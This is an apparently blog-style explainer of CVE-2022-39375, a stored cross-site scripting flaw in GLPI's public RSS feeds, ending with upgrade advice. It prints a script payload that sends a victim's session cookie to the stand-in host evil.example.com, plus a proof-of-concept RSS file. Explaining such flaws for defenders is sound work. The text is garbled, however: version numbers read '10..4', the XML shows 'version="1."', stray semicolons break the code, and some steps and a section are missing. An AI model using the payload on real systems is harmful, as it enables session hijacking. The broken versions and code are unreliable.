GLPI, short for *Gestionnaire Libre de Parc Informatique*, is a widely used Free Asset and IT Management Software. It’s favored by many organizations for its rich ITIL Service Desk features, license management, and software audit capabilities. But, like any popular tool, vulnerabilities can be discovered — some with alarming potential.

One such threat is CVE-2022-39375. In this article, we’ll break down what this vulnerability is, how it can be exploited, and, most importantly, what you need to do to stay safe.

What is CVE-2022-39375?

Disclosed in late 2022, CVE-2022-39375 affects GLPI versions prior to 10..4. The issue lies in the way GLPI lets users create public RSS feeds. The system doesn't properly sanitize input, allowing attackers to inject *malicious code* that can get executed on the dashboards of other users who view the infected feed.

In short:  
An attacker can create an RSS feed containing harmful content. When another GLPI user, perhaps an admin, adds this feed to their dashboard, the attacker’s code runs in their browser—potentially leaking sensitive info or taking control of the session.

How Does the Exploit Work?

The core problem is insufficient input sanitization. When users create a public RSS feed, certain fields (like the title or description) can contain unexpected HTML or JavaScript.

When the dashboard loads, the code executes inside the victim’s browser.

Typical Payload Example:

An attacker might use a payload like

<title>Breaking News<script>fetch('https://evil.example.com/steal?cookie='; + document.cookie)</script></title>

If this gets rendered without filtering on a dashboard, the <script> tag runs, stealing the victim’s session cookie.

Let’s say you can edit the RSS as a user

<?xml version="1." encoding="UTF-8" ?>
<rss version="2.">
  <channel>
    <title>Malicious <script>alert('XSS in GLPI!')</script> Feed</title>
    <description>This feed will pop alert()</description>
    <link>http://glpi.example.com/</link>;
    <item>
      <title>Something bad happened</title>
      <description>Testing</description>
      <link>http://glpi.example.com/item</link>;
    </item>
  </channel>
</rss>

2. User Adds Feed to Dashboard

When this feed is added to any GLPI dashboard, the dashboard’s code will execute any &lt;script&gt; embedded in the feed if unpatched.

Spreading further malware internally

For IT teams who rely on GLPI to manage critical infrastructure, the risks can be severe.

How to Fix

The GLPI team has patched this vulnerability in version 10..4. You should upgrade immediately, as there is no known workaround or mitigation.

Backup your GLPI data.

2. Download the latest version 10..4  
3. Follow the official upgrade instructions

Double-check all dashboards for unfamiliar RSS feeds after upgrade

Important: Just removing suspicious feeds or users is not enough. The root issue is the code parsing bug, which is only fixed in 10..4+.

References

- Official GLPI Security Advisory
- NVD – National Vulnerability Database Entry
- GLPI Releases on GitHub

Conclusion

*CVE-2022-39375* exposed GLPI users to a serious dashboard code injection vector. If you’re using GLPI, prioritize upgrading to version 10..4 or later right away. There’s no other way to stay secure. IT management tools are a juicy target—don’t let your organization be the next victim of a simple but damaging bug.

Stay secure—patch fast! If you have questions about this exploit, read the advisory or ask in the official GLPI forums.


*This write-up was made exclusively for educational awareness. Don’t exploit systems you don’t have permission to test. Always report bugs responsibly and help build a safer digital world.*

Timeline

Published on: 11/03/2022 16:15:00 UTC
Last modified on: 11/03/2022 19:04:00 UTC